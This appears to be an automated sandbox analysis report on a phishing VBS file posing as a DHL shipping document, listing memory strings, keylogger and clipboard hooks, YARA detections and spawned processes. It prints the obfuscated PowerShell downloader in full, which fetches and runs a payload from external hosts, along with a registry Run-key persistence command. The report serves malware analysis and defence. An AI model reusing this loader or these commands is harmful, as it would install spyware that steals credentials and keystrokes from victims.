              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Ned
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Neds
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedsl
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedsla
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslag
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagn
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagni
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnin
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagning
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.d
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dw
              Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwp
              Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379A562000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://moviesmacktalk.com/Nedslagnings.dwpX
              Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-09-10-14/PreSignInSettingsConfig.json
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=6c2de995c290b031854b
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=eafda5
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?481b7caa9fdb7105b2103a8300811877
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://rum18.perf.linkedin.com/apc/trans.gif?d99a5c14daed171e4daf3a2c1226bd16
              Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
              Source: wab.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhvB999.tmp.19.dr | String found in binary or memory: https://www.office.com/
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60918
              Source: unknown | Network traffic detected: HTTP traffic on port 60918 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0041183A OpenClipboard,GetLastError,DeleteFileW,19_2_0041183A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,21_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,22_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,22_2_004072B5

              E-Banking Fraud

              Source: Yara match | File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

              System Summary

              Source: amsi32_7792.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Initial file | Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)
              Source: DHL Shipping Document Awb & BL.vbs | Static file information: Suspicious name
              Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4250
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 4250
              Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_04586E09 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,10_2_04586E09
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,19_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00401806 NtdllDefWindowProc_W,19_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004018C0 NtdllDefWindowProc_W,19_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_004016FD NtdllDefWindowProc_A,21_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 21_2_004017B7 NtdllDefWindowProc_A,21_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
              Source: DHL Shipping Document Awb & BL.vbs | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: amsi32_7792.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,19_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,22_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,19_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,19_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 19_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,19_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Proskriberes.Bet
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7792
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000013.00000002.2023090570.00000000038AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_21-33248
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
